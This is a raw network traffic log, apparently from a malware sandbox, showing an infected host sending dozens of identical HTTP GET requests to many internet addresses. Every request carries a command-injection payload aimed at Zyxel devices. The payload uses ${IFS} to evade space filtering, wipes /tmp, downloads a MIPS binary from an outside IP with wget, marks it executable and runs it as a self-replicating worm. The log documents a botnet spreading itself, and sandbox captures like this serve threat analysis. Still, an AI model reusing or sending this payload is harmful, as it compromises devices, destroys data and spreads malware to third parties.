                              Mar 31, 2024 08:41:14.664951086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2561192.168.2.134952817.84.183.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665004969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2562192.168.2.1341968191.51.157.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665046930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2563192.168.2.1343994223.203.86.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665095091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2564192.168.2.1359188184.243.217.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665147066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2565192.168.2.133358095.34.81.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665194988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2566192.168.2.1357660131.133.212.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665260077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2567192.168.2.1335390212.18.187.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665318966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2568192.168.2.134124849.238.211.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665365934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2569192.168.2.135903697.158.176.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665411949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2570192.168.2.1355384119.123.41.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665453911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2571192.168.2.1350728168.79.48.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665494919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2572192.168.2.1353818104.119.154.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665543079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2573192.168.2.13474082.226.252.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665616989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2574192.168.2.1354214197.50.105.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665667057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2575192.168.2.1354256114.150.72.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665745020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2576192.168.2.1357170140.226.122.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665803909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2577192.168.2.135783649.160.136.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665843964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2578192.168.2.136046868.104.102.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665894985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2579192.168.2.135957051.65.95.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.665968895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2580192.168.2.1342556139.129.208.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666022062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2581192.168.2.135479264.210.138.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666079998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2582192.168.2.1341776168.101.43.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666111946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2583192.168.2.133517892.44.33.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666165113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2584192.168.2.1337954210.52.110.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666218996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2585192.168.2.1351956163.210.190.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666256905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2586192.168.2.133825495.252.211.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666317940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2587192.168.2.1333600203.150.71.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666372061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2588192.168.2.1344986128.182.129.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666410923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2589192.168.2.1360990126.198.123.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666445971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2590192.168.2.1349998205.205.187.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666492939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2591192.168.2.1360826220.250.204.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666533947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2592192.168.2.1334460120.47.229.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666582108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2593192.168.2.1332926189.110.15.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666639090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2594192.168.2.1348648157.202.194.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666757107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2595192.168.2.134426458.178.25.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666790962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2596192.168.2.133492483.171.96.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666838884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2597192.168.2.1333032199.3.19.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666897058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2598192.168.2.135424279.15.156.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.666975975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2599192.168.2.1348092132.184.141.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667006969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2600192.168.2.1349028106.255.210.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667064905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2601192.168.2.134269651.20.7.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667109966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2602192.168.2.1353970219.26.232.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667155981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2603192.168.2.1359666217.0.247.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667192936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2604192.168.2.136024697.102.54.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667247057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2605192.168.2.1357668180.166.206.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667273045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2606192.168.2.1334978209.83.172.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667316914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2607192.168.2.133530260.179.21.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667388916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2608192.168.2.1351328205.77.246.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667438030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2609192.168.2.1348668101.129.234.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667500019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2610192.168.2.134459666.81.113.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667519093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2611192.168.2.135702051.158.207.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667561054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2612192.168.2.136076427.12.86.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667612076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2613192.168.2.1336390208.219.126.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667659998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2614192.168.2.13476901.202.203.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667706966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2615192.168.2.134113085.116.68.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667778015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2616192.168.2.1355926209.133.85.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667826891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2617192.168.2.1339096130.80.142.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667877913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2618192.168.2.133980267.36.131.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.667948961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2619192.168.2.134559049.153.123.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.668000937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2620192.168.2.1342220114.235.179.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.668039083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2621192.168.2.1335596128.53.138.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.668109894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2622192.168.2.133800847.185.139.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.668159008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2623192.168.2.1340140133.245.250.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.668205976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2624192.168.2.135518465.77.137.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.668255091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2625192.168.2.133349863.117.86.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.672296047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2626192.168.2.135302049.133.249.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.680238008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2627192.168.2.1359118217.64.216.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.680288076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2628192.168.2.1347454134.53.100.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.680311918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2629192.168.2.134253098.46.190.230443
                              TimestampBytes transferredDirectionData
